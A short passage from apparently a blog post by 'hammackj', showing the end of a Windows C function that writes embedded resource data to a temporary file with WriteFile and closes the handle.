    _tprintf(TEXT("[!] Unable to create file handle for writing temp data to disk.\n"));
 
    return;
  }
 
  while(bytes_written < resource_size)
  {
    if(FALSE == WriteFile(file_handle, resource_data + bytes_written, resource_size - bytes_written, &bytes_written, NULL))
    {
      CloseHandle(file_handle);
 
      return;
    }
  }
 
  CloseHandle(file_handle);
}

 

Posted by hammackj

no comments